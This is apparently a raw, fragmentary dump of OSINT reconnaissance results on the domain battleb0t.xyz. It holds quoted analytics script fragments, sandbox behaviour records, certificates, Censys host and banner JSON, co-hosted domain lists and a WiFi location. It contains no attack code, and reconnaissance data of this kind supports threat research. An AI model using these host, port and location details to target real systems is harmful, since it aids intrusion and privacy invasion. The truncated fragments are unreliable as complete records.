0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=H.hidden?!1:.5<=Nk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Hv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "[]);if(!g.length)return!0;var h=rx(a,c,e);P(121);"https://www.facebook.com/tr/"===h["gtm.elementUrl"]&&P(122);if(T(79)&&"https://www.facebook.com/tr/"===h["gtm.elementUrl"])return!0;if(d&&f){for(var m=fb(b,g.length),n=0;n<g.length;++n)g[n](h,m);return m.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},ux=function(){var a=[],b=function(c){return Ka(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);" (Indicator: "facebook.com")\n "var my=function(a,b,c,d,e){var f=Lv("fsl",c?"nv.mwt":"mwt",0),g;g=c?Lv("fsl","nv.ids",[]):Lv("fsl","ids",[]);if(!g.length)return!0;var h=Hv(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);P(121);"https://www.facebook.com/tr/"===m&&P(122);if(T(79)&&"https://www.facebook.com/tr/"===m)return!0;h["gtm.elementUrl"]=m;null!=a.getAttribute("name")&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&" (Indicator: "facebook.com")\n "b,"vert.pix");break;case "PERCENT":My(d.verticalThresholds,b,"vert.pct")}Lv("sdl","init",!1)?Lv("sdl","pending",!1)||J(function(){return Ny()}):(Jv("sdl","init",!0),Jv("sdl","pending",!0),J(function(){Ny();if(Oy()){var e=Py();qc(z,"scroll",e);qc(z,"resize",e)}else Jv("sdl","init",!1)}));return b}Ty.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Uy=["www.youtube.com","www.youtube-nocookie.com"],Vy,Wy=!1;" (Indicator: "youtube")\n "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Fg:d,Dg:e,Eg:f,jh:g,kh:h,Qd:m,ib:b},p=z.YT,q=function(){bz(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(ez(w,"iframe_api")||ez(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Wy&&cz(x[A],n.Qd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")\n "Wy=!0,b});return b}fz.N="internal.enableAutoEventOnYouTubeActivity";var gz;function hz(a){var b=!1;return b}hz.N="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "* Copyright 2011-2018 Twitter, Inc." (Indicator: "twitter")\n "if (!window.isInIFrame && /twitter/i.test(navigator.userAgent) && window.playerConfig.video.url) {" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar300.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id' | 185.199.110.153 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | acilacikveteriner.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | RumbleUser (Category: political)
https://rumble.com/user/login | login |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007us.github.io]
https://www.openphish.com/feed.txt | 007us.github.io |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-oo.github.io | 185.199.111.153 |
| 2023-05-12 02:50:15 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c7:83:d8:18:48:a0:26:ac:0e:41:bf:5e:7d:c6:c3:07
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Jan 17 09:16:26 2023 GMT
Not After : Apr 17 09:16:25 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c9:69:39:93:28:ab:3e:d3:a5:d5:a5:72:cd:be:
43:92:fc:b1:41:1e:65:40:ba:b6:a5:98:c9:0a:c1:
0a:16:38:c6:f0:6f:13:8a:f1:50:6e:63:c7:c9:4d:
3d:84:6a:35:2b:f1:16:92:ef:9c:26:1f:97:22:55:
e7:7e:fd:a5:40:94:99:7b:2a:b2:9f:89:9a:e1:30:
e0:1b:38:af:f1:7d:fe:1d:f3:e2:fc:ad:49:66:7b:
1e:5b:c2:73:59:c0:35:17:1a:cb:8b:a8:f6:c4:6d:
b8:77:b7:bc:64:fb:68:2f:62:4e:80:30:15:70:8f:
2d:50:8e:a9:f6:b0:b5:02:42:f1:48:e2:81:92:3e:
44:a6:5b:69:a6:54:e5:ee:c1:74:2a:c1:ec:11:dc:
59:f2:1e:65:9f:eb:94:d2:24:cd:99:20:ee:91:26:
11:c9:44:8f:62:f0:c5:34:f8:77:d4:9d:29:a7:42:
e2:30:2c:71:73:82:02:34:4e:a9:30:9a:b9:ab:95:
0a:72:71:e0:79:05:25:70:cd:6a:cc:a1:b4:51:7d:
04:6f:2b:68:12:e1:a4:1d:84:68:0d:5c:76:58:33:
de:fd:16:f6:1b:5f:7b:dc:4d:c0:66:3d:ae:d0:46:
c8:c8:e1:83:f9:b8:7a:33:57:f8:8e:90:08:fd:c7:
e2:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
31:FB:31:C7:D3:F3:CF:11:AF:91:FA:E4:71:40:41:2F:C4:66:90:11
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/mFVJO6PGh8g
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/Zn3bDrcK0Gs.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
8f:de:2d:05:92:69:48:3c:56:fc:22:08:a2:35:bd:c8:57:65:
b5:6f:33:0c:aa:bc:76:e8:1d:42:77:47:bc:ae:0e:80:ed:dd:
d3:8e:f7:0f:aa:49:99:2e:fb:bb:2f:e3:ed:b0:fc:04:11:23:
70:ae:f2:d5:ad:55:18:89:fd:c2:f1:f7:ab:64:01:10:ce:86:
6e:5a:5f:19:d1:b4:39:19:cf:7c:c2:bd:e3:c7:5a:bd:91:f4:
86:d0:db:9a:02:e1:5f:ff:08:f2:7f:c9:ca:5d:f9:53:49:db:
4d:e4:6b:a2:d8:53:33:76:e9:c8:7d:9b:a1:37:1c:e1:fd:14:
c0:c4:e2:28:fe:cc:ba:5c:25:d8:86:52:ce:0d:c5:7f:e7:b5:
d9:3e:e1:65:14:17:4f:8c:55:fc:01:58:43:fe:c7:c5:4b:26:
e2:ea:0b:c9:ff:2c:52:b5:ab:00:e9:06:49:51:c2:01:ca:b5:
6a:c4:ae:a2:17:c3:86:ec:ec:a7:72:a4:4e:b6:4e:3e:d9:0b:
df:8f:84:de:6a:96:ce:0d:8d:26:ac:b2:5c:45:1f:a0:e5:df:
88:dd:84:9f:fe:46:1e:e9:a2:91:bb:ae:08:4d:ff:a2:51:db:
43:d0:e5:a3:df:91:dd:52:a9:23:85:54:e1:34:57:f4:c7:f8:
24:6b:63:ba
|
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft websites | battleb0t.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-proxy-cache: MISS | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | chacha20-poly1305@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.142): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:52 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["80B6:49F3:235A56C:358722C:645CDF0C"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-kigq8000067-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683808012.126331,VS0,VE23"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["68f03409faf68cb6eb3782ac00da0088b30b8906"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8003::153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Alparslan (Net ID: 00:08:5C:FF:1B:97) | 40.2024, 29.0398 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c57adae9fbb90f2-FRA
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:55:05 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T00:44:58.534Z", "ip": "188.114.97.1", "location_updated_at": "2023-04-29T21:54:15.361063Z", "autonomous_system_updated_at": "2023-04-29T21:54:15.361178Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"karriere-job-booster.com": {"record_type": "A", "resolved_at": "2023-04-22T14:40:02.799652037Z"}, "landing.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-15T13:31:47.102980654Z"}, "barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-11-07T14:46:42.708236475Z"}, "www.barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-14T14:46:07.712552308Z"}, "en.jahanbaygan.com": {"record_type": "A", "resolved_at": "2022-12-02T13:39:13.675188752Z"}, "www.clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-04-18T20:54:02.995698546Z"}, "stafferty.lt": {"record_type": "A", "resolved_at": "2022-11-13T15:02:07.210831297Z"}, "total-ev-charge.com": {"record_type": "A", "resolved_at": "2023-04-10T16:35:40.386710867Z"}, "smtp.sharoshop.com": {"record_type": "A", "resolved_at": "2022-10-23T14:06:43.660097027Z"}, "question-orthographe.net": {"record_type": "A", "resolved_at": "2022-12-25T11:23:33.248567488Z"}, "edu.rabinia.com": {"record_type": "A", "resolved_at": "2022-10-25T13:57:12.441109542Z"}, "mail.mardinscarf.com": {"record_type": "A", "resolved_at": "2022-11-01T13:38:25.278618273Z"}, "wolny.poker": {"record_type": "A", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "www.alvandcenter.com": {"record_type": "A", "resolved_at": "2022-11-07T12:46:16.283141371Z"}, "www.les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-12T13:36:36.298008873Z"}, "web3rh.tk": {"record_type": "A", "resolved_at": "2023-02-20T04:15:37.204816270Z"}, "cisp.su": {"record_type": "A", "resolved_at": "2023-05-03T21:53:16.954543221Z"}, "megafrica.ao": {"record_type": "A", "resolved_at": "2022-10-02T12:04:18.005028285Z"}, "ftp.baharelm.ir": {"record_type": "A", "resolved_at": "2023-01-11T15:16:43.150193914Z"}, "dl.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-26T15:24:28.844795223Z"}, "www.mrandmrsdesousa.co.uk": {"record_type": "A", "resolved_at": "2023-01-03T16:16:24.443812711Z"}, "barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-15T14:22:57.320001219Z"}, "finalsfootyfantasy.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:32.701218324Z"}, "inthemachine.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:39.481058126Z"}, "api.snoor.shop": {"record_type": "A", "resolved_at": "2022-11-22T01:28:36.076229399Z"}, "www.shop.charkhak.ir": {"record_type": "A", "resolved_at": "2022-10-14T15:11:46.056786726Z"}, "www.irancamping.com": {"record_type": "A", "resolved_at": "2022-10-13T13:47:56.298914617Z"}, "emberstreet.rocks": {"record_type": "A", "resolved_at": "2023-05-01T02:31:05.910468718Z"}, "www.sanayepishro.com": {"record_type": "A", "resolved_at": "2022-10-23T11:24:26.165823422Z"}, "bezi386.xyz": {"record_type": "A", "resolved_at": "2023-03-16T01:18:53.784985236Z"}, "www.vitanco.com.mx": {"record_type": "A", "resolved_at": "2023-04-23T18:35:54.572453429Z"}, "stafferty.lv": {"record_type": "A", "resolved_at": "2022-11-12T15:01:01.637935320Z"}, "www.otherend.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:39.580563012Z"}, "clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-05-07T21:19:52.237134340Z"}, "oscord.net": {"record_type": "A", "resolved_at": "2023-05-07T20:04:57.891682634Z"}, "mail.bokharsanat.com": {"record_type": "A", "resolved_at": "2023-04-28T14:34:55.423339504Z"}, "irancamping.com": {"record_type": "A", "resolved_at": "2022-10-07T10:43:58.475530009Z"}, "www.barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-10-10T14:59:00.508858938Z"}, "beautybeyondhair.buzz": {"record_type": "A", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "www.oxinpc.ir": {"record_type": "A", "resolved_at": "2022-10-09T15:06:46.974209710Z"}, "www.ostrovok.net": {"record_type": "A", "resolved_at": "2023-05-07T20:05:01.309575808Z"}, "centrumpedikury.sk": {"record_type": "A", "resolved_at": "2022-10-02T16:33:19.851015297Z"}, "uncoveryourconfidence.org": {"record_type": "A", "resolved_at": "2023-05-01T20:11:56.835607536Z"}, "dubuy.dk": {"record_type": "A", "resolved_at": "2023-05-04T17:27:40.171255307Z"}, "mail.lskala.com": {"record_type": "A", "resolved_at": "2023-01-21T13:35:04.083346865Z"}, "compete.pics": {"record_type": "A", "resolved_at": "2023-05-03T21:18:20.511512892Z"}, "karriere-job-booster.at": {"record_type": "A", "resolved_at": "2023-04-12T21:48:57.147456694Z"}, "mail.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "fi.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-05-01T14:32:55.216085423Z"}, 